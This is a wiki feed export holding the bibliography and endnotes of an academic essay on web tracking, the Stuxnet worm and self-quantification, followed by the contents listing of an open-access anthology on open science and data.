&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4722</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4722"/>
		<updated>2012-05-06T10:31:34Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
